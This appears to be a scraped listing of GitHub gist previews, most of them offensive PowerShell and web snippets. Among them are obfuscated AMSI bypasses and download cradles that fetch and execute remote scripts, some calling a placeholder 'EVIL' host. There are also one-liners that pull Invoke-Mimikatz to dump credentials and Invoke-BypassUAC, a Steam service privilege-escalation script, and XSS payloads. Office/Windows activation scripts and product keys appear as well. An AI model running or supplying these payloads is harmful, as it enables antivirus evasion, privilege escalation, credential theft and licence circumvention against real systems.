This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Variables | |
$serverAddress = "127.0.0.1" | |
$serverPort = 25575 | |
$Password = "" | |
$ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop | |
class RconPacket { | |
# https://developer.valvesoftware.com/wiki/Source_RCON_Protocol | |
hidden [byte[]] $pktSize | |
[byte[]] $PktId |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body> | |
<script>alert(document.domain)</script> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
echo #Supported products: Office 365 ProPlus (x86-x64) | |
echo. | |
echo. | |
(if exist "%ProgramFiles%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles%\Microsoft Office\Office16") | |
(if exist "%ProgramFiles(x86)%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles(x86)%\Microsoft Office\Office16") | |
(for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul) | |
(for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul) | |
echo. | |
echo ============================================================================ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
info: | |
title: Classic API Resource Documentation | |
description: | | |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('XSS\n'+document.domain) src=1>"></form> | |
version: production | |
basePath: /JSSResource/ | |
produces: | |
- application/xml |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Obfuscate the AMSI bypass | |
#Powershell ISE > Start-Steroids | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) | |
#If Obfuscation is not working with steroids, split all string! | |
[Ref].Assembly.GetType('System.Management.Automation.Am'+'siU'+'tils').GetField('am'+'siIn'+'itFai'+'led','NonPublic,Static').SetValue($null,$true) | |
#New Obfuscated method 2023 | |
$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true) | |
# nishang - 2.2.0 (Jul 24, 2021) | |
# Change this to "attacker-local-ip" for internal sources | |
wget('https://gist.githubusercontent.com/pich4ya/144d32262861b573279d15e653c4e08d/raw/6f019c4e2f1f62ffc0754d01dff745d3cec62057/Invoke-SoHighSoHigh.ps1') -UseBasicParsing|iex |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. Open CMD as Administrator | |
2. Paste the following commands into the Cmd: One by one, follow the order. | |
cscript slmgr.vbs /ipk "SERIAL NUMBER HERE" | |
Replace SERIAL NUMBER HER with any of these, according your Windows 10 installation type. | |
Home/Core TX9XD-98N7V-6WMQ6-BX7FG-H8Q99 | |
Home/Core (Country Specific) PVMJN-6DFY6-9CCP6-7BKTT-D3WVR | |
Home/Core (Single Language) 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$cmd = Read-Host -Prompt 'Enter the command you wish to execute as system' | |
Write-Host "[*] Installing NTObjectManager..." | |
install-module NTObjectManager -Scope CurrentUser -Force | |
import-module NTObjectManager | |
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" | |
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service") | |
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service" | |
Get-Service "Steam Client Service" | Restart-Service | |
Write-Host "[*] Sleeping 5 seconds" | |
Start-Sleep 5 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |